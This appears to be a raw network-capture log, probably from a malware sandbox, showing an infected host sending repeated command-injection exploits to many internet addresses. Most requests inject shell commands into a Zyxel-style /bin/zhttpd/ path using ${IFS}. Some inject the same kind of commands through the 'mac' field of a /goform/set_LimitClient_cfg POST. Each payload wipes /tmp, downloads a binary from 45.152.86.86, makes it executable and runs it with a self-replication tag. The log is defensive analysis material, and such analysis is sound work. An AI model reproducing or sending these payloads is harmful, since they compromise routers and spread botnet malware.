                              Mar 31, 2024 08:42:07.348624945 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8561192.168.2.1349092187.46.147.87443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:07.348670959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8562192.168.2.1346172174.122.192.253443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:07.348691940 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8563192.168.2.1339990200.124.39.110443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:07.348767996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8564192.168.2.135523889.75.97.159443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:07.348815918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8565192.168.2.1340438196.45.109.163443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:07.348831892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8566192.168.2.1357446201.254.252.106443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:07.348891020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8567192.168.2.1332994111.221.159.222443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:07.348937988 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8568192.168.2.135044693.198.143.102443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:07.348973989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8569192.168.2.1338840113.37.148.2443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:07.349025011 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8570192.168.2.134313068.210.173.133443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:07.349090099 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8571192.168.2.135725297.205.189.244443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:07.349134922 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8572192.168.2.1335244153.168.58.114443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:07.349184990 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8573192.168.2.134057867.20.41.189443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:07.349244118 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8574192.168.2.135201892.110.187.199443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:07.349301100 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8575192.168.2.1360236114.238.8.210443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:07.349371910 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8576192.168.2.13500849.128.66.80443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:07.349401951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8577192.168.2.13362481.213.9.111443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:07.349438906 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8578192.168.2.1344578110.214.7.164443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:07.349497080 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8579192.168.2.1342038133.20.149.116443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:07.349534035 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8580192.168.2.13605345.70.123.240443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:08.356888056 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8581192.168.2.1358026114.55.80.189443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:08.356930017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8582192.168.2.1342164222.125.169.224443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:08.356988907 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8583192.168.2.1356612139.164.231.183443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:08.357037067 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8584192.168.2.1356308186.154.113.39443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:08.357101917 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8585192.168.2.1338294173.159.82.56443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:08.357151985 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8586192.168.2.134903249.131.67.119443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:08.357207060 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8587192.168.2.135372666.136.109.243443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:08.357269049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8588192.168.2.1348558189.28.236.5443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:08.357325077 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8589192.168.2.133729032.70.174.111443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:08.357383013 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8590192.168.2.1357484110.221.125.88443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:08.357444048 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8591192.168.2.133967438.128.181.55443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:08.357501984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8592192.168.2.135753685.0.135.221443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:08.357578039 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8593192.168.2.1336898198.241.19.60443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:08.357635975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8594192.168.2.1344456109.129.112.14443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:08.357688904 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8595192.168.2.1337592124.225.149.217443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:08.357770920 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8596192.168.2.134517640.126.113.195443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:08.357789993 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8597192.168.2.1349592176.137.80.30443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:08.357845068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8598192.168.2.1354432178.60.200.62443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:08.357898951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8599192.168.2.1357106177.223.205.58443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:08.357940912 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8600192.168.2.1351400210.111.33.180443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:08.358002901 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8601192.168.2.1358442129.204.211.138443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:08.358056068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8602192.168.2.133725231.214.244.828080
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:08.586576939 CEST191OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                              Cookie: user=admin
                              Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                              Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8603192.168.2.133362677.76.140.1438080
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:08.618616104 CEST191OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                              Cookie: user=admin
                              Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                              Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
                              Mar 31, 2024 08:42:08.830615044 CEST454INHTTP/1.1 400 Bad Request
                              Date: Sun, 31 Mar 2024 06:42:08 GMT
                              Server: Apache/2.4.43 (FreeBSD) OpenSSL/1.1.1h-freebsd PHP/7.4.7
                              Content-Length: 226
                              Connection: close
                              Content-Type: text/html; charset=iso-8859-1
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                              Session IDSource IPSource PortDestination IPDestination Port
                              8604192.168.2.1335176172.103.89.1428080
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:08.783121109 CEST191OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                              Cookie: user=admin
                              Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                              Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
                              Mar 31, 2024 08:42:08.994790077 CEST506INHTTP/1.1 400 Bad Request
                              Content-Type: text/html
                              Content-Length: 345
                              Connection: close
                              Date: Sun, 31 Mar 2024 06:42:08 GMT
                              Server: WebServer
                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                              Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 Bad Request</title> </head> <body> <h1>400 Bad Request</h1> </body></html>


                              Session IDSource IPSource PortDestination IPDestination Port
                              8605192.168.2.1336806183.230.101.708080
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:08.784441948 CEST179OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                              Cookie: user=admin
                              Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                              Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
                              Mar 31, 2024 08:42:09.204477072 CEST303INHTTP/1.1 400 Bad Request
                              Server: openresty
                              Date: Sun, 31 Mar 2024 06:42:09 GMT
                              Content-Type: text/html
                              Content-Length: 154
                              Connection: close
                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                              Session IDSource IPSource PortDestination IPDestination Port
                              8606192.168.2.134559444.143.46.125443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:09.362514973 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8607192.168.2.1340726118.178.166.252443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:09.362548113 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8608192.168.2.13440845.17.9.79443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:09.362622023 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8609192.168.2.1345330108.113.224.248443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:09.362693071 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8610192.168.2.135390034.0.60.218443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:09.362705946 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8611192.168.2.134281272.61.17.24443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:09.362756968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8612192.168.2.1352474184.5.234.236443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:09.362756968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
